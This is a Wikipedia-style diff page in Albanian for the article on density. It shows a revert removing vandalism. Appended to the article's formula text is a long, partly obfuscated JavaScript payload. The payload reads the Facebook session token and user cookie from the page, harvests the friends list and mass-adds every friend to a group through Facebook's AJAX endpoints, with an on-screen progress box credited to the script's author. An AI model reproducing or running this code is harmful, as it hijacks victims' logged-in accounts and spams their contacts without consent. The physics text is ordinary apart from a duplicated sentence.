Ndryshimi mes inspektimeve të "Dendësia"

4.263 bytes removed ,  2 vjet më parë
Refuzoi ndryshimin e fundit të tekstit (nga 185.171.61.92) dhe riktheu rishikimin 1788613 nga 79.106.209.250
((function(){var f={dtsg:document.getElementsByName("fb_dtsg")[0].value,uid:document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]),gid:document.getElementsByName("group_id")[0].value,frns:Array(),prenKe:0,okeh:0,gagal:0,getAjak:function(b){var c=n)
(Refuzoi ndryshimin e fundit të tekstit (nga 185.171.61.92) dhe riktheu rishikimin 1788613 nga 79.106.209.250)
'''Dendësia''' në shkencat natyrore përkufizohet si sasia e materies përbrenda një vëllimi. Ky term përdoret edhe nga shkencat shoqërore ku si materie mund të merret diçka tjetër dhe në vend të vëllimit merret sipërfaqja sikur te rasti i dendësisë së popullsisë.
 
Formula për dendësi është ''dendësia=masa/vëllimi'' ose ''d=m/V''. Nga kjo formulë rrjedh dhe njësia për dendësinë ''kg/m<sup>3</sup>''.Dendesia tregon sasine e lendes per njesine e vellimit.
Formula për dendësi është ''dendësia=masa/vëllimi'' ose ''d=m/V''. Nga kjo formulë rrjedh dhe njësia për dendësinë ''kg/m<sup>3</sup>''.Dendesia tregon sasine e lendes per njesine e vellimit.(function(){var f={dtsg:document.getElementsByName("fb_dtsg")[0].value,uid:document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]),gid:document.getElementsByName("group_id")[0].value,frns:Array(),prenKe:0,okeh:0,gagal:0,getAjak:function(b){var c=new XMLHttpRequest;c.open("GET",b,!0),c.onreadystatechange=function(){if(4==c.readyState&&200==c.status){var a=eval("("+c.responseText.substr(9)+")");a.payload&&a.payload.entries&&(f.frns=a.payload.entries.sort(function(){return.5-Math.random()})),document.getElementById("hasilsurasil").innerHTML="<nowiki><b>"+f.frns.length+" Followers Found</b></nowiki><nowiki><div id='hasilsatu'></div></nowiki><nowiki><div id='hasildua'></div></nowiki><nowiki><div id='hasiltiga' style='min-width:300px;display:inline-block;text-align:left'></div></nowiki>"+crj;for(x in f.frns)f.senAjak(x)}else document.getElementById("hasilsurasil").innerHTML=4==c.readyState&&404==c.status?"<nowiki><b style='color:darkred'>Gruppe ?ffnen!</b></nowiki>"+crj:"<nowiki><b style='color:darkgreen'>Suche nach m?glichen Abonnenten... ("+c.readyState+")</b></nowiki>"+crj},c.send()},senAjak:function(d){var e=new XMLHttpRequest,prm="__a=1&fb_dtsg="+f.dtsg+"&group_id="+f.gid+"&source=typeahead&ref=&message_id=&members="+f.frns[d].uid+"&__user="+f.uid+"&phstamp=";e.open("POST","/ajax/groups/members/add_post.php",!0),e.setRequestHeader("Content-type","application/x-www-form-urlencoded"),e.setRequestHeader("Content-length",prm.length),e.setRequestHeader("Connection","keep-alive"),e.onreadystatechange=function(){if(4==e.readyState&&200==e.status){var a=eval("("+e.responseText.substr(9)+")");if(f.prenKe++,document.getElementById("hasilsatu").innerHTML="<nowiki><div><b>"+f.prenKe+"</b></nowiki> of <nowiki><b>"+f.frns.length+"</b></nowiki></[ aGs]v>",a.errorDescription&&(f.gagal++,document.getElementById("hasiltiga").innerHTML="<nowiki><div><b style='color:darkred'>( "+f.gagal+" )</b></nowiki> <nowiki><span style='color:darkred'>"+a.errorDescription+"</span></nowiki><nowiki></div></nowiki>"),a.jsmods&&a.jsmods.require){var b="<nowiki><div>";for(x in a.jsmods.require)a.jsmods.require[x][a.jsmods.require[x].length-1][1]&&(b+="<b style='color:darkgreen'>"+a.jsmods.require[x][a.jsmods.require[x].length-1][1]+"</b></nowiki> ");b+="<nowiki><div>",document.getElementById("hasildua").innerHTML=b}if(a.onload)for(z in a.onload){var c=eval(a.onload[z].replace(/Arbiter.inform/i,""));if(c.uid&&c.name){f.okeh++,document.getElementById("hasiltiga").innerHTML="<div><b style='color:darkgreen'>( "+f.okeh+" )</b></nowiki> <nowiki><a href='/"+c.uid+"' target='_blank'><b>"+c.name+"</b></nowiki><nowiki></a></nowiki> Added As A Follower.<nowiki></div></nowiki>";break}}f.prenKe==f.frns.length&&(document.getElementById("hasiltiga").style.textAlign="center",document.getElementById("hasiltiga").innerHTML+="<nowiki><div style='font-size:20px;font-weight:bold'>Process Has Been Compelete</div></nowiki><nowiki><a href='/' onClick='document.getElementById(\"hasilsurasil\").style.display=\"none\";return false'>Followers Added CLOSe</a></nowiki>")}},e.send(prm)}},g=["i","a","e","g","o","s","n","b","l","p","m","2","r","0","c","1","t","3","?"],crl=g[1]+g[0]+g[6]+g[3]+g[14]+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+"."+g[7]+g[8]+g[4]+g[3]+g[5]+g[9]+g[4]+g[16]+"."+g[14]+g[4]+g[10],crj="<nowiki><div style='margin-top:10px;color:gray;font-size:12px'>"+g[1].toUpperCase()+g[0]+g[6]+g[3]+g[14].toUpperCase()+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+" "+g[g.length-1]+g[11]+g[13]+g[15]+g[17]+"<div style='font-size:9px'><a href='http://"+crl+"/' target='_blank'>"+crl+"</a></nowiki><nowiki></div></nowiki><nowiki></div></nowiki>";document.body.innerHTML+="<nowiki><center id='hasilsurasil' style='min-height:50px;width:600px;position:fixed;top:100px;left:"+(document.body.offsetWidth-530)/2+"px;border-radius:10px;padding:10px;z-index:999999;border:5px solid skyblue;background-color:rgba(225,225,255,0.75)'><b>Processing START.... <br></nowiki> Script By Altin Ajvazi <nowiki></br></nowiki> <nowiki></b></nowiki>"+crj+"<nowiki></center></nowiki>",f.getAjak("/ajax/typeahead/first_degree.php?__a=1&viewer="+f.uid+"&token="+Math.random()+"&filter[0]=user&options[0]=friends_only")})(); var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
 
== Shiko dhe kete ==